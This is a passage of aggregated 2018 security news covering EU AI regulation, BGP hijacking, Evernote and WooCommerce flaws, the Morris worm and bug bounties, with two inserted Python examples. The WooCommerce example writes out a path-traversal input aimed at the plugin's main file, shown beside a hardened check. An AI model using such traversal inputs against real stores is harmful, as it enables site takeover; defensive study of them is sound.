Here he specifically refers to a Bloomberg article titled, 'Microsoft Says AI Advances Will Require New Laws, Regulations'. But what the article actually says is, "Over the next two years, Microsoft plans to codify the company's ethics and design rules to govern its AI work, using staff from [Brad] Smith's legal group and the AI group run by Executive Vice President Harry Shum. The development of laws will come a few years after that, Smith said."

In other words, Microsoft expects regulation to take account of what it decides to do in AI, not that AI needs regulation before Microsoft codifies what it wants to do. Again, this implies that big business believes -- and acts -- as if business is more important than government: that profit supersedes democracy.

Nemitz believes that this attitude towards early stage development of the internet has allowed the development of a lawless internet. "Avoiding the law or intentionally breaking it, telling half truth to legislators or trying to ridicule them, as we recently saw in the Cambridge Analytica hearings by Mark Zuckerberg of Facebook, became a sport on both sides of the Atlantic in which digital corporations, digital activists and digital engineers and programmers rubbed shoulders."

He does neither himself nor his argument any favors, however, in warning that the unregulated internet has evolved into a medium for populists to communicate their ideologies in a manner not suited to democratic discourse. "Trump ruling by Tweet is the best example for this." While he may be accurate in principle, this personalization opens his argument to the criticism of bias.

Nemitz believes that the long-standing attitude by big business towards privacy and the internet must not be allowed to embed itself into AI and the internet. The implication is that this can only be controlled by regulation, and that regulation must be imposed by law rather than reached by consensus among the tech companies.

Business is likely to disagree. The first argument will be that you simply cannot regulate something as nebulous as artificial intelligence, nor should you wish to.

"Is regulatory control necessary over the navigation algorithm in my Roomba vacuum cleaner?" asks Raj Minhas, VP and director of the PARC Interactions and Analytics Lab at PARC (a Xerox company). "Is regulatory control necessary over the algorithm in my camera that automatically determines the exposure settings? Market forces can easily take care of these and many other similar AI systems."

It should be noted, however, that Nemitz is not calling for the regulation of AI itself, but for regulation over the use of AI and its effect on consumers. Indeed, in this sense, the European Union already has some AI regulation within GDPR -- automatic data subject profiling is prohibited. So, if AI within a vacuum cleaner collects data on its user, or if AI in a camera collects information on user interests for either cleaning companies' or holiday companies' targeted advertising purposes, without consent, this is already illegal under GDPR.

So, it is the abuse of AI driven by big business' need for profit rather than AI itself that concerns him. GDPR does not attempt to regulate targeted advertising -- instead it seeks to regulate the abuse of personal privacy used in targeted advertising. Nemitz believes the same principle-based technology-neutral approach to regulating AI abuses, even though we do not yet know what these future abuses might be, should be the way forward.

His first principle is to remove the subjective elements of human illegality, such as 'intent' or 'negligence'. Then, "it will be important to codify in law the principle that an action carried out by AI is illegal if the same action carried out by a human, abstraction made of subjective elements, would be illegal."

But he believes the foundation for AI regulation could be required impact assessments. For government use of AI, theses assessments would need to be made public. They would underpin 'the public knowledge and understanding' of AI, which currently lacks 'transparency'. The standards for such assessments would need to be set in law. "And as in the GDPR, the compliance with the standards for the impact assessment would have to be controlled by public authorities and non compliance should be subject to sufficiently deterrent sanctions."

But perhaps the key requirement he proposes is that "the use of AI should have a right, to be introduced by law, to an explanation of how the AI functions, what logic it follows, and how its use affect the interests of the individual concerned, thus the individual impacts of the use of AI on a person, even if the AI does not process personal data."

In other words, the argument put forward by Google that it is not responsible for the automated decisions of its search algorithms should be rejected, and the same rejection applied to all algorithms within AI. This will force responsibility for the effect of AI onto the user of that AI, regardless of the outcome on the object.

Such ideas and proposals can be viewed as the starting gun for GDPR-style legislation for AI. Nemitz is not a European Commissioner, so this is not an official viewpoint. But he is senior adviser in the most relevant EC office. It would be unrealistic to think these views are unknown or contrary to current early thinking within the EC. The likelihood is that there will be some GDPR-like legislation in the future. It is many years off -- but the arguments start now.

One of the biggest problems is that it could be seen as a governing party issue. Whether Nemitz views it like this or not, it could be claimed that he is asserting the right of an unelected European Commission to rule over citizens who could directly impose their will against what they use by pure market forces, without the interference of bureaucrats.

It could also be claimed that it is more driven by politico-economic wishes than by altruism. The 'frightful five' are all non-EU companies (i.e. U.S. companies) dominating the market and suppressing EU companies by force of their success. In short, it could be claimed that AI regulation is driven by anti-American economic bias.

Such arguments are already being made. Raj Minhas, while accepting that some of the Nemitz arguments and conclusions are fair, thinks that overall Nemitz is being too simplistic. He points out that the paper makes no mention of the 'good' achieved by the internet. "Would even a small fraction of that have been realized if the development of the internet had been shackled?" he asked SecurityWeek.

"He portrays technology companies (e.g. Google, Apple, Facebook, Amazon, and Microsoft) as shady cabals that are working to undermine democracy. Of course, the reality is far more complex," he said. "The technologies produced by those companies have done more to spread democracy and individual agency than most governments. The fact that they make lots of money should not automatically be considered a nefarious activity."

These large corporations are described as monoliths that single-mindedly work to undermine democracy. "Again, the reality is far more complex. These companies face immense pressure from their own employees to act in transparent and ethical ways -- they push them to give up lucrative military/government contracts because they don't align with the values of those employees. The fact that all these companies have a code of ethics for AI research is an outcome of those values rather than a diabolical plot to usurp democracy (as alleged by the author)."

The implication is that regulation is best left to self-regulation by the companies and their employees. This is a view confirmed by Nathan Wenzler, senior director of cybersecurity at Moss Adams. He accepts that there will inevitably need to be some regulation to "at least define where liability will rest and allow businesses to make sound decisions around whether or not it's worth it to pursue the course." He cites the moral and ethical issues around driverless vehicles when AI might be forced to decide between who to injure most in an unavoidable collision situation.

But as to more general AI regulation, he suggests, "Government regulators aren't exactly known for responding quickly to changes in technology matters, and as rapidly as AI programs are moving into becoming integrated into nearly everything, we may quickly reach a point where it simply won't be possible to regulate it all effectively... In the meantime, the best course of action we have presently is for the businesses involved in developing AI-powered tools and services to make the ethical considerations an integral part of their business decisions. It may be the only way we see the advantages of this technology take flight, while avoiding the potentially devastating down sides."

Kenneth Sanford, analytics architect and U.S. lead at Dataiku, takes a nuanced view. He separates the operation of AI from the environment in which it is made and deployed. AI itself cannot be regulated. "Algorithms such as deep neural networks and ensemble models create an infinite number of possible recommendations that can never be regulated," he told SecurityWeek.

He doesn't think that AI-based decision-making is actually changing much. "We have had personalized suggestions and persuasive advertising for years derived from generalizations and business rules. The main difference today is that these rules are codified in more finely determined micro segments and are delivered in a more seamless fashion in a digital world. In short, the main difference between now and 20 years ago is that we are better at it."

Any scope for regulation, he suggests, lies in the environment of AI. "What data are collected and how these data are used are a more realistic target for guardrails on the industry," he suggests.

This, however, is already regulated by GDPR. The unsaid implication is that no further AI-specific regulation is necessary or possible. But if the EU politicians take up the call for AI regulation as put forward by Paul Nemitz -- and his influence should not be discounted -- then there will be AI regulation. That legislation will potentially be more complex and far reaching than GDPR. The bigger question is not whether it will happen, but to what extent will GAFAM be able to shape it to their own will.

China Telecom Constantly Misdirects Internet Traffic
8.11.2018 securityweek 

Over the past years, China Telecom has been constantly misdirecting Internet traffic through China, researchers say.

The telecommunication company, one of the largest in China, has had a presence in North American networks for nearly two decades, and currently has 10 points-of-presence (PoPs) in the region (eight in the United States and two in Canada), spanning major exchange points.

Courtesy of this presence, the company was able to hijack traffic through China several times in the past, Chris C. Demchak and Yuval Shavitt revealed in a recent paper (PDF). China Telecom’s PoPs in North America made the rerouting not only possible, but also unnoticeable for a long time, the researchers say.

Back in 2010, China Telecom hijacked 15% of the world’s Internet prefixes, which resulted in popular websites being rerouted through China for around 18 minutes. The incident impacted US government (“.gov”) and military (“.mil”) sites as well, the commission assigned to investigate the incident revealed (PDF).

For the past several years, the Internet service provider (ISP) has been engaging in various forms of traffic hijacking, in some cases for days, weeks, and months, Demchak and Shavitt claim.

“The patterns of traffic revealed in traceroute research suggest repetitive IP hijack attacks committed by China Telecom. While one may argue such attacks can always be explained by ‘normal’ BGP behavior, these in particular suggest malicious intent, precisely because of their unusual transit characteristics – namely the lengthened routes and the abnormal durations,” the researchers note.

Doug Madory, Director of Internet Analysis at Oracle, confirms the paper’s findings that the ISP has been engaged in traffic hijacking for a long time, but says the purpose of the action remains unclear. Oracle has gained deep visibility into Web traffic after the acquisition of web traffic management firm Dyn in 2016.

“China Telecom (whether intentionally or not) has misdirected internet traffic (including out of the United States) in recent years. I know because I expended a great deal of effort to stop it in 2017,” Madory says.

One of the observed incidents happened on December 9, 2015, when networks around the world who accepted the misconfigured routes inadvertently sent traffic to Verizon APAC through China Telecom.

After being alerted on the issue “over the course of several months last year,” two of the largest carriers of the affected routes implemented filters to no longer accept Verizon routes from China Telecom, which “reduced the footprint of these routes by 90%,” Madory notes.

Last year, he says, traffic was sent via mainland China even if it was supposed to travel only between peers in the United States. The issue repeated several times and resulted in a major US Internet infrastructure company deploying “filters on their peering sessions with China Telecom to block Verizon routes from being accepted.”

Referred to as BGP hijacking attacks (and also known as prefix or route hijacking), such incidents have become increasingly frequent over the past years, with a recent attack targeting payment processing companies in the US. According to Cloudflare, Resource Public Key Infrastructure (RPKI) could be the answer to securing BGP (Border Gateway Protocol) routing.

Evernote Flaw Allows Hackers to Steal Files, Execute Commands
8.11.2018 securityweek  Hacking 

A serious cross-site scripting (XSS) vulnerability discovered in the Evernote application for Windows can be exploited to steal files and execute arbitrary commands.

A researcher who uses the online moniker Sebao identified a stored XSS flaw in the Evernote app. He found that when a picture was added to a note and later renamed, JavaScript code could be added instead of a name. If the note was shared with another Evernote user, the code would get executed when the recipient clicked on the picture.

Evernote patched this security hole in September with the release of version 6.16. However, TongQing Zhu of Knownsec 404 Team found that arbitrary code could still be injected into the name of an attached picture.

Unlike in the previous case, however, the code loads a Node.js file from a remote server. The script is executed via NodeWebKit, an application runtime that is used by Evernote in presentation mode.

For the attack to work, the attacker needs to convince the targeted user to open an Evernote note in presentation mode. If the exploit is successfully executed, the attacker can steal arbitrary files and execute commands.

TongQing Zhu showed how a hacker could exploit the vulnerability to read a Windows file and execute the Calculator application on the targeted system.

Evernote first patched the flaw, tracked as CVE-2018-18524, with the release of Evernote for Windows 6.16.1 beta in mid-October. The patch was rolled out to all users earlier this month with the release of Evernote 6.16.4.

TongQing Zhu has published a couple of videos showing how the vulnerability can be exploited.

BehavioSec Adds New Features to Behavioral Biometrics Platform
8.11.2018 securityweek 

The relationship between security and user friction remains problematic. Businesses can increase security by strengthening authentication procedures, for example, by requiring multi-factor authentication in the form of soft tokens or biometric proof of identity. But this invariably makes it more time-consuming and complex for the user. This complexity, usually known as user friction, deters online visitors and encourages in-house staff to seek ways to bypass it.

But there are two further problems with the traditional approach to user authentication. Firstly, it only confirms the user at log-in, and secondly, attackers are increasingly succeeding in their attempts to defeat traditional multi-factor authentication. If an attacker gets past the initial authentication, he is into the network as an authenticated user.

It is the circle of user friction and single point verification that the relatively new concept of continuous behavioral biometrics seeks to square. Behavioral biometrics differs from (but can include) traditional biometrics by defining 'how you behave' rather than 'who you are'. It doesn't do this just at the point of entry but continuously while the user is accessing the system. So, if attackers use stolen credentials and get through the log-in stage, they will still be detected by how they use the system.

Behavioral biometrics operates by building a user profile. It doesn't require any personal information from the user, nor does it require any additional process by the user. It measures aspects like keyboard, touch pad and touch screen habits: two-finger typing versus touch-typing; touch pad pressure; swipe directions; and so on. For in-house systems it includes geo-location of the user, normal access times, normal folder accesses, etc.

The result is an accurate ongoing confirmation of the user. If the logged-in user doesn't conform to the behavioral habits of the user profile, he or she is flagged as a possible intruder. The result is that multi-factor initial authentication barriers can be lowered -- reducing user friction -- while overall security is raised.

San Francisco, Calif-based BehavioSec, founded in 2007 by Olov Renberg, pioneered this approach to authentication. It has now added new features to version 5.0 of its Behavioral Biometrics Platform announced Wednesday, November 7, 2018.

Some of the new features are new capabilities; others improve existing operation. New features include global profiling, detection of obfuscated origin, and Docker container support.

Global profiling now detects suspicious behavior by comparing the current user session to those in BehavioSec's entire protected population -- helping to detect new account fraud by users never previously seen by BehavioSec or the customer concerned.

This is strengthened by BehavioSec's new ability to detect obfuscated origins hidden by VPNs, Tor, and other proxy services. It flags bad actors on their first connection by matching suspect requests against a real-time feed of 1.5 billion compromised devices.

The new support for Docker containers makes it easier to deploy BehavioSec in many on-prem environments.

Enhanced features in version 5.0 include improved continuous touch support, new detection algorithms, and improved case management.

The improved continuous touch support makes mobile user authentication more efficient. By including gesture information, mobile fraud can be detected even where the traditional keyboard doesn't exist, and the on-screen keyboard has only limited use.

The new detection algorithms reduce the number of interactions required to profile and recognize users, and improve the recognition of remote access attempts by bots. Bots and remote access scripts typically operate against the system in a pattern completely different to a human user.

Improved case management automates the integration of fraud alerts with third-party case management systems. This helps the fraud analysts better manage the process of responding to the alerts generated by the BehavioSec rules engine.

"Our financial services, retail and other customers all have common digital transformation goals," commented BehavioSec VP of products, Jordan Blake; "they need to rapidly scale security in ways that drive customers' trust and improve the user experience across Web and mobile interfaces."

With the new Docker support, and enhanced detection and integration updates, he added, "we continue to turn the tables on fraud by making 'the human algorithm' the strongest link in security. By continuously authenticating users according to unique behavioral attributes -- instead of a password or text message someone can steal -- BehavioSec reinvents anti-fraud. Traditional password-driven security is increasingly known for performance limitations and needless friction."

BehavioSec has raised a total of $25.7 million in venture funding. The most recent Series B funding, announced in January 2018, raised $17.5 million. It was led by Trident Capital.

Microsoft Releases Guidance for Users Concerned About Flawed SSD Encryption
8.11.2018 securityweek 

After security researchers discovered vulnerabilities in the encryption mechanism of several types of solid-state drives (SSDs), Microsoft decided to explain how one can enforce software encryption instead.

In a paper published earlier this week, researchers from Radboud University in the Netherlands revealed a series of bugs in self-encrypting SSDs from Samsung and Crucial that essentially nullify the full-disk encryption feature.

Furthermore, they also showed that the issues can even break software-based encryption. Specifically, they explained, Microsoft’s BitLocker would rely on hardware encryption when it detects the functionality, thus leaving data unprotected on Windows systems where the flawed SSDs are used.

On Tuesday, Microsoft published an advisory to provide information on how users can enforce software encryption on their Windows systems, given that, when a self-encrypting drive is present, BitLocker would use hardware encryption by default.

“Administrators who want to force software encryption on computers with self-encrypting drives can accomplish this by deploying a Group Policy to override the default behavior. Windows will consult Group Policy to enforce software encryption only at the time of enabling BitLocker,” Microsoft says.

Admins can check the type of drive encryption being used (hardware or software) by running ‘manage-bde.exe -status’ from an elevated command prompt. If there are drives encrypted using a vulnerable form of hardware encryption, they can be switched to software encryption via a Group Policy.

To make the switch from hardware encryption to software encryption, the drive would first need to be unencrypted and then re-encrypted using software encryption, the tech giant notes. The drive, however, does not require reformatting.

“If you are using BitLocker Drive Encryption, changing the Group Policy value to enforce software encryption alone is not sufficient to re-encrypt existing data,” Microsoft says.

After configuring and deploying a Group Policy to enable forced software encryption, admins should completely turn off BitLocker to decrypt the drive, and then simply re-enable it.
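The check Microsoft describes starts with reading the ‘manage-bde.exe -status’ output, which is tedious to do by eye across a fleet. The following Python example, added here and not Microsoft's own tooling, parses that output and lists the volumes whose Encryption Method reports hardware encryption, i.e. the ones that need the decrypt-and-re-enable cycle after the Group Policy is deployed. The embedded output is constructed to match the command's general layout (volume header followed by indented key/value lines) and the sizes, labels and OID are sample values.

```python
"""Find BitLocker volumes that still rely on the SSD's hardware encryption.

Added example. Parses the text that `manage-bde.exe -status` prints; the
sample output below is constructed and only approximates the real layout.
"""
import re

# Constructed sample of `manage-bde -status` output (three volumes).
SAMPLE_STATUS = """\
BitLocker Drive Encryption: Configuration Tool version 10.0.17134
Copyright (C) 2013 Microsoft Corporation. All rights reserved.

Disk volumes that can be protected with
BitLocker Drive Encryption:
Volume C: [Windows]
[OS Volume]

    Size:                 476.69 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    Hardware Encryption - 1.3.111.2.1619.0.1.2
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        TPM
        Numerical Password

Volume D: [Data]
[Data Volume]

    Size:                 931.51 GB
    BitLocker Version:    2.0
    Conversion Status:    Fully Encrypted
    Percentage Encrypted: 100.0%
    Encryption Method:    XTS-AES 128
    Protection Status:    Protection On
    Lock Status:          Unlocked
    Identification Field: Unknown
    Key Protectors:
        Password
        Numerical Password

Volume E: [Backup]
[Data Volume]

    Size:                 111.79 GB
    BitLocker Version:    None
    Conversion Status:    Fully Decrypted
    Percentage Encrypted: 0.0%
    Encryption Method:    None
    Protection Status:    Protection Off
    Lock Status:          Unlocked
    Identification Field: None
    Key Protectors:       None Found
"""

VOLUME_RE = re.compile(r"^Volume ([A-Z]):\s*\[(.*)\]\s*$")
# Exactly four leading spaces: deeper-indented lines are key-protector entries.
FIELD_RE = re.compile(r"^ {4}(\S[^:]*):\s*(.*?)\s*$")


def parse_manage_bde_status(text: str) -> dict[str, dict[str, str]]:
    """Return {drive_letter: {field: value, ...}} for every volume block."""
    volumes: dict[str, dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = VOLUME_RE.match(line)
        if m:
            current = volumes.setdefault(m.group(1), {"Label": m.group(2)})
            continue
        m = FIELD_RE.match(line)
        if m and current is not None:
            current[m.group(1)] = m.group(2)
    return volumes


def uses_hardware_encryption(fields: dict[str, str]) -> bool:
    """True when the volume is protected by the drive's own (SED) encryption."""
    return fields.get("Encryption Method", "").lower().startswith("hardware encryption")


def volumes_needing_reencryption(text: str) -> list[str]:
    """Drive letters that are BitLocker-protected but only by hardware encryption.
    These must be decrypted and re-encrypted once the Group Policy that forces
    software encryption is in place; unencrypted volumes are not listed."""
    return sorted(
        letter
        for letter, fields in parse_manage_bde_status(text).items()
        if fields.get("Protection Status") == "Protection On"
        and uses_hardware_encryption(fields)
    )


if __name__ == "__main__":
    for letter, fields in parse_manage_bde_status(SAMPLE_STATUS).items():
        print(f"{letter}: {fields['Encryption Method']} ({fields['Protection Status']})")
    print("needs re-encryption:", volumes_needing_reencryption(SAMPLE_STATUS))
```

On a real host, feed the script the output of `manage-bde.exe -status` run from an elevated prompt instead of the constructed sample.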

Google Wants More Projects Integrated With OSS-Fuzz
8.11.2018 securityweek 

Google this week revealed plans to reach out to critical open source projects and invite them to integrate with OSS-Fuzz.

Launched in December 2016, OSS-Fuzz is a free and continuous fuzzing infrastructure hosted on the Google Cloud Platform and designed to serve the Open Source Software (OSS) community through finding security vulnerabilities and stability issues.

OSS-Fuzz has already helped find and report over 9,000 flaws since launch, including bugs in critical projects such as FreeType2, FFmpeg, LibreOffice, SQLite, OpenSSL, and Wireshark.

Recently, Google has managed to consolidate the bug hunting and reporting processes into a single workflow, by unifying and automating its fuzzing tools, and believes that the OSS community should take advantage of this.

Thus, the Internet search giant has decided to contact the developers of critical projects and invite them to integrate with the fuzzing service.

“Projects integrated with OSS-Fuzz will benefit from being reviewed by both our internal and external fuzzing tools, thereby increasing code coverage and discovering bugs faster,” Google says.

Previously, the reporting process was a bit complex, as multiple tools were being used to identify bugs, while submissions were manually made to various public bug trackers, and then monitored until resolved.

“We are committed to helping open source projects benefit from integrating with our OSS-Fuzz fuzzing infrastructure. In the coming weeks, we will reach out via email to critical projects that we believe would be a good fit and support the community at large,” Google now says.

Projects that integrate are also eligible for rewards that range from $1,000 for initial integration to $20,000 for ideal integration. The rewards, Google says, should “offset the cost and effort required to properly configure fuzzing for OSS projects.”

Developers who would like to integrate their projects with OSS-Fuzz can submit them for review. Google wants to “admit as many OSS projects as possible and ensure that they are continuously fuzzed.” Contacted developers might be provided with a sample fuzz target for easy integration, the search company says.

30 Years Ago, the World's First Cyberattack Set the Stage for Modern Cybersecurity Challenges
8.11.2018 securityweek 

(THE CONVERSATION) - Back in November 1988, Robert Tappan Morris, son of the famous cryptographer Robert Morris Sr., was a 20-something graduate student at Cornell who wanted to know how big the internet was – that is, how many devices were connected to it. So he wrote a program that would travel from computer to computer and ask each machine to send a signal back to a control server, which would keep count.

The program worked well – too well, in fact. Morris had known that if it traveled too fast there might be problems, but the limits he built in weren’t enough to keep the program from clogging up large sections of the internet, both copying itself to new machines and sending those pings back. When he realized what was happening, even his messages warning system administrators about the problem couldn’t get through.

His program became the first of a particular type of cyber attack called “distributed denial of service,” in which large numbers of internet-connected devices, including computers, webcams and other smart gadgets, are told to send lots of traffic to one particular address, overloading it with so much activity that either the system shuts down or its network connections are completely blocked.

As the chair of the integrated Indiana University Cybersecurity Program, I can report that these kinds of attacks are increasingly frequent today. In many ways, Morris’s program, known to history as the “Morris worm,” set the stage for the crucial, and potentially devastating, vulnerabilities in what I and others have called the coming “Internet of Everything.”

Unpacking the Morris worm

Worms and viruses are similar, but different in one key way: A virus needs an external command, from a user or a hacker, to run its program. A worm, by contrast, hits the ground running all on its own. For example, even if you never open your email program, a worm that gets onto your computer might email a copy of itself to everyone in your address book.

In an era when few people were concerned about malicious software and nobody had protective software installed, the Morris worm spread quickly. It took 72 hours for researchers at Purdue and Berkeley to halt the worm. In that time, it infected tens of thousands of systems – about 10 percent of the computers then on the internet. Cleaning up the infection cost hundreds or thousands of dollars for each affected machine.

In the clamor of media attention about this first event of its kind, confusion was rampant. Some reporters even asked whether people could catch the computer infection. Sadly, many journalists as a whole haven’t gotten much more knowledgeable on the topic in the intervening decades.

Morris wasn’t trying to destroy the internet, but the worm’s widespread effects resulted in him being prosecuted under the then-new Computer Fraud and Abuse Act. He was sentenced to three years of probation and a roughly US$10,000 fine. In the late 1990s, though, he became a dot-com millionaire – and is now a professor at MIT.

Rising threats

The internet remains subject to much more frequent – and more crippling – DDoS attacks. With more than 20 billion devices of all types, from refrigerators and cars to fitness trackers, connected to the internet, and millions more being connected weekly, the number of security flaws and vulnerabilities is exploding.

In October 2016, a DDoS attack using thousands of hijacked webcams – often used for security or baby monitors – shut down access to a number of important internet services along the eastern U.S. seaboard. That event was the culmination of a series of increasingly damaging attacks using a botnet, or a network of compromised devices, which was controlled by software called Mirai. Today’s internet is much larger, but not much more secure, than the internet of 1988.

Some things have actually gotten worse. Figuring out who is behind particular attacks is not as easy as waiting for that person to get worried and send out apology notes and warnings, as Morris did in 1988. In some cases – the ones big enough to merit full investigations – it’s possible to identify the culprits. A trio of college students was ultimately found to have created Mirai to gain advantages when playing the “Minecraft” computer game.

Fighting DDoS attacks

But technological tools are not enough, and neither are laws and regulations about online activity – including the law under which Morris was charged. The dozens of state and federal cybercrime statutes on the books have not yet seemed to reduce the overall number or severity of attacks, in part because of the global nature of the problem.

There are some efforts underway in Congress to allow attack victims in some cases to engage in active defense measures – a notion that comes with a number of downsides, including the risk of escalation – and to require better security for internet-connected devices. But passage is far from assured.

There is cause for hope, though. In the wake of the Morris worm, Carnegie Mellon University established the world’s first Cyber Emergency Response Team, which has been replicated in the federal government and around the world. Some policymakers are talking about establishing a national cybersecurity safety board, to investigate digital weaknesses and issue recommendations, much as the National Transportation Safety Board does with airplane disasters.

More organizations are also taking preventative action, adopting best practices in cybersecurity as they build their systems, rather than waiting for a problem to happen and trying to clean up afterward. If more organizations considered cybersecurity as an important element of corporate social responsibility, they – and their staff, customers and business partners – would be safer.

In “3001: The Final Odyssey,” science fiction author Arthur C. Clarke envisioned a future where humanity sealed the worst of its weapons in a vault on the moon – which included room for the most malignant computer viruses ever created. Before the next iteration of the Morris worm or Mirai does untold damage to the modern information society, it is up to everyone – governments, companies and individuals alike – to set up rules and programs that support widespread cybersecurity, without waiting another 30 years.

U.S. Cyber Command CNMF Shares unclassified malware samples via VirusTotal
8.11.2018 securityaffairs

The U.S. Cyber Command (USCYBERCOM) CNMF is sharing malware samples with the cybersecurity industry via VirusTotal intelligence service.
The U.S. Cyber Command (USCYBERCOM) is providing unclassified malware samples to the VirusTotal intelligence service with the intent of sharing them with the cybersecurity industry.

The USCYBERCOM’s Cyber National Mission Force (CNMF) is going to share the unclassified malware samples on the CYBERCOM_Malware_Alert VirusTotal account.

Researchers interested in the sample can follow the USCYBERCOM malware reporting handle on Twitter.

“Today, the Cyber National Mission Force, a unit subordinate to U.S. Cyber Command, posted its first malware sample to the website VirusTotal. Recognizing the value of collaboration with the public sector, the CNMF has initiated an effort to share unclassified malware samples it has discovered that it believes will have the greatest impact on improving global cybersecurity.” USCYBERCOM stated.

CNMF was launched to improve information sharing on the cyber threats and allow early detection of the activities of malicious cyber actors.

The USCYBERCOM Malware Alert account tweeted on Nov 5, 2018: “This Twitter account was created solely to provide alerts to the cybersecurity community that #CNMF has posted new malware to @virustotal. A log of our uploads can be found here: https://www.virustotal.com/en/user/CYBERCOM_Malware_Alert/ …”
The first samples shared by CNMF on VirusTotal belong to the Lojack (LoJax) family. In May, several LoJack agents were found to be connecting to servers that are believed to be controlled by the notorious Russia-linked Fancy Bear APT group.

The samples recently shared appear to be associated with the UEFI rootkit discovered in September by the malware researchers from ESET.

Personally, I believe that this initiative is really important to rapidly profile threat actors and mitigate the spreading of malicious codes.

A flaw in WooCommerce WordPress Plugin could be exploited to take over e-stores
8.11.2018 securityaffairs
Exploit Vulnerability

A critical Remote Code Execution vulnerability affects eCommerce websites running on WordPress and using the WooCommerce plugin.
A critical vulnerability affects eCommerce websites running on WordPress and using the WooCommerce plugin. WooCommerce is one of the major eCommerce plugins for WordPress and allows operators to easily build e-stores based on the popular CMS; it accounts for more than 4 million installations with a 35% market share.

The vulnerability is an arbitrary file deletion vulnerability that could be exploited by a malicious or compromised privileged user to take over the online store.

The flaw was discovered by Simon Scannell, a researcher at RIPS Technologies GmbH.

“A flaw in the way WordPress handles privileges can lead to a privilege escalation in WordPress plugins. This affects for example WooCommerce, the most popular e-commerce plugin with over 4 million installations.” reads the security advisory published by RIPSTECH.

“The vulnerability allows shop managers to delete certain files on the server and then to take over any administrator account.”

The vulnerability was already fixed with the release of the plugin version 3.4.6.

Scannell pointed out that arbitrary file deletion flaws aren't usually considered critical issues, because attackers typically use them to cause a denial of service by deleting the site's index.php. However, the expert highlighted that by deleting certain plugin files in WordPress an attacker can disable security checks and take over the e-commerce website.

The expert published a PoC video that shows how exploiting the flaw allows an account with the "Shop Manager" role to reset administrator accounts' passwords and take over the store.

The installation process of the plugin creates the "Shop Manager" role with the "edit_users" capability, which means that these accounts can edit store customer accounts to manage their orders, profiles, and products.

The expert pointed out that an account with "edit_users" in WordPress could also edit an administrator account; for this reason, the WooCommerce plugin implements extra limitations to prevent abuse.

Scannell discovered that if an administrator of a WordPress website disables the WooCommerce component, the limitations the plugin implements no longer apply, allowing Shop Manager accounts to edit administrator accounts and reset their passwords.

The expert explained that an attacker who controls a Shop Manager account can disable the WooCommerce plugin by exploiting a file deletion vulnerability in the plugin's logging feature.

“By default, only administrators can disable plugins. However, RIPS detected an arbitrary file deletion vulnerability in WooCommerce. This vulnerability allows shop managers to delete any file on the server that is writable. By deleting the main file of WooCommerce, woocommerce.php, WordPress will be unable to load the plugin and then disables it.” continues the post.

“The file deletion vulnerability occurred in the logging feature of WooCommerce.”

Once the flaw is exploited and the WooCommerce plugin is disabled, the shop manager can take over any administrator account and then execute code on the server.
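The chain above hinges on one thing: a log-deletion handler that builds a path from a user-supplied log handle without confining it to the log directory. The following is an added example written for this page, not WooCommerce's own code; it assumes a WordPress layout under /var/www/html with file logs in wp-content/uploads/wc-logs, and it assumes the handle arrives as a plain request parameter. It shows what a naive handler would end up deleting when given the traversal string that reaches woocommerce.php, and a hardened path check that rejects it.

```python
import posixpath
from typing import Optional

# Assumed store layout; wc-logs is where WooCommerce keeps its file-based logs.
WP_CONTENT = "/var/www/html/wp-content"
LOG_DIR = posixpath.join(WP_CONTENT, "uploads", "wc-logs")


def naive_delete_target(handle: str) -> str:
    """What a handler that simply concatenates directory + user input ends up deleting."""
    return posixpath.normpath(posixpath.join(LOG_DIR, handle))


def safe_log_path(handle: str) -> Optional[str]:
    """Accept a bare *.log file name that resolves inside LOG_DIR; return None for anything else."""
    if not handle or handle in (".", ".."):
        return None
    # Path separators (either flavour) and NUL have no business in a log handle.
    if any(c in handle for c in ("/", "\\", "\x00")):
        return None
    # Only log files may be removed through this interface, never PHP or anything else.
    if not handle.endswith(".log"):
        return None
    candidate = posixpath.normpath(posixpath.join(LOG_DIR, handle))
    # Defence in depth: whatever the checks above missed, the result must stay under LOG_DIR.
    if posixpath.commonpath([LOG_DIR, candidate]) != LOG_DIR:
        return None
    return candidate


# Constructed attacker input: climbs out of wc-logs to the plugin's main file.
TRAVERSAL_HANDLE = "../../plugins/woocommerce/woocommerce.php"

if __name__ == "__main__":
    print("naive handler would unlink:", naive_delete_target(TRAVERSAL_HANDLE))
    print("hardened handler returns:  ", safe_log_path(TRAVERSAL_HANDLE))
    print("legitimate handle resolves:", safe_log_path("fatal-errors-2018-10-11.log"))
```

The extension allow-list does most of the work here; the commonpath check is there so that a future change to the filename rules cannot silently reopen the traversal.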

Below is the timeline for the flaw:

2018/08/30 The arbitrary file deletion vulnerability was reported to the Automattic security team on HackerOne.
2018/09/11 The vulnerability was triaged and verified by the security team.
2018/10/11 A patch was released.
The Automattic security team addressed the flaw with the release of plugin version 3.4.6.

U.S. Air Force announced Hack the Air Force 3.0, the third Bug Bounty Program
8.11.2018 securityaffairs

The United States Air Force announced earlier this week that it has launched its third bug bounty program, called Hack the Air Force 3.0.
The United States Air Force launched earlier this week its third bug bounty program, called Hack the Air Force 3.0, in collaboration with HackerOne.

“Thank you for your interest in participating in HackerOne’s U.S. Department of Defense (DoD) “Hack the Air Force 3.0” Bug Bounty challenge.” reads the announcement published by the United States Air Force.

“This is an effort for the U.S. Department of the Air Force to explore new approaches to its security, and to adopt the best practices used by the most successful and secure software companies in the world. By doing so, the U.S. Air Force can ensure its systems and warfighters are as secure as possible.”

The program started on October 19 and will last more than four weeks; it is scheduled to end on November 22.

Hack the Air Force 3.0 is the largest bug bounty program run by the U.S. government to date, involving up to 600 researchers.

“Hack the AF 3.0 demonstrates the Air Force's willingness to fix vulnerabilities that present critical risks to the network,” said Wanda Jones-Heath, Air Force chief information security officer.

Participants will have to find vulnerabilities in Department of Defense applications; 70% of the participants will be selected by the HackerOne reputation system and the remainder will be selected randomly.

The bug bounty is open for U.S. persons as defined by the Internal Revenue Code Section 7701(a)(30), including U.S. Government contractor personnel. The challenge is also open to foreign nationals based on their Government passport, who are not on the U.S. Department of Treasury’s Specially Designated Nationals List, and who are not citizens of China, Russia, Iran, and the Democratic People’s Republic of Korea.

“If you submit a qualifying, validated vulnerability, you may be eligible to receive an award, pending a security and criminal background check. Specific information on payment eligibility will be provided upon acceptance into the challenge.” continues the announcement.

The minimum payout for this challenge is $5,000 for critical vulnerabilities.

